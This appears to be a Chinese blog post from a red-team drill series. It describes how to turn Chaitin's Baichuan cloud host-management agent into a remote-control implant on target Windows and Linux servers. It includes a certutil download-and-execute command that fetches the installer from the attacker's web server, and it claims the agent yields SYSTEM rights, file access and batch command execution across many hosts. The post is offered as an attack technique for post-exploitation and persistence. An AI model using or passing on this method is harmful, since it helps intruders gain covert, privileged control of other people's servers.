实战攻防演练-利用长亭百川云平台上线远控提权

随笔2个月前发布 星空闪
32 0 0

合集 – 逸尘-实战攻防演练(5)
1.实战攻防演练–利用微软自带Certutil命令ByPassAV上传C22023-10-202.实战攻防演练-利用Everything搜索软件进行内网后渗透利用2023-10-213.实战攻防演练-WinRar压缩包创建自解压木马2023-10-17
4.实战攻防演练-利用长亭百川云平台上线远控提权2023-10-245.实战攻防演练-Linux写入ssh密钥,利用密钥登录2023-10-30

收起

前言

长亭百川云平台是北京长亭未来科技有限公司旗下的 SaaS 产品服务平台,专注于云安全解决方案。其提供牧云·主机管理助手、网站监测、牧云·云原生安全平台、雷池 Web 应用防火墙等一系列在线安全产品,帮助企业用户更轻松地治理云安全问题,使云上业务更加安全可靠。在使用中发现该产品可以用于攻防对抗中实战,其生成的客户端可是远程上线,获取到服务器主机任意权限,最后会提升至系统权限,适用于后渗透权限提升维持。

实战演示

网站地址:https://rivers.chaitin.cn
在开始使用长亭百川云服务之前,需要先注册一个百川云账号。有账号后可以在百川云登录
实战攻防演练-利用长亭百川云平台上线远控提权

选择进入工作台,选择牧云主机管理助手
实战攻防演练-利用长亭百川云平台上线远控提权

其中这里区分三个版本,基础版,体验版,付费版,具体如下所示,掏钱的肯定比不掏好用,看个人情况选择。
实战攻防演练-利用长亭百川云平台上线远控提权

Windows上线木马

这里如下所示,windows主机需要浏览器下载后,使用其他命令运行
实战攻防演练-利用长亭百川云平台上线远控提权

这里首先下载木马文件后上传至自己的网站服务器,使用certutil命令下载执行
certutil -urlcache -split -f http://127.0.0.1/installer.exe c:installer.exe && start installer.exe
或者直接上传目标服务器运行 start installer.exe
实战攻防演练-利用长亭百川云平台上线远控提权

服务端就会上线
实战攻防演练-利用长亭百川云平台上线远控提权

配置信息

这里可以对上线主机进行查看基础配置,和文件管理操作
实战攻防演练-利用长亭百川云平台上线远控提权
实战攻防演练-利用长亭百川云平台上线远控提权

权限提升

如下,我们使用Administrator权限上线执行,牧云管理助手直接获取到系统权限,省去权限提升步骤
实战攻防演练-利用长亭百川云平台上线远控提权

Linux上线木马

配置入上一致,linux直接复制命令后,在目标主机执行,详细操作类似于windows操作
实战攻防演练-利用长亭百川云平台上线远控提权
实战攻防演练-利用长亭百川云平台上线远控提权
实战攻防演练-利用长亭百川云平台上线远控提权

详细配置

实战攻防演练-利用长亭百川云平台上线远控提权

其他功能

可以执行管理查看docker服务
实战攻防演练-利用长亭百川云平台上线远控提权

安全扫描功能可以检测主机漏洞风险,及常见漏洞等
实战攻防演练-利用长亭百川云平台上线远控提权

应用市场可以下载各种软件
实战攻防演练-利用长亭百川云平台上线远控提权

统一配置

推送命令模块可以对多主机群进行批量上线木马
实战攻防演练-利用长亭百川云平台上线远控提权

批量命令执行
实战攻防演练-利用长亭百川云平台上线远控提权

© 版权声明

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...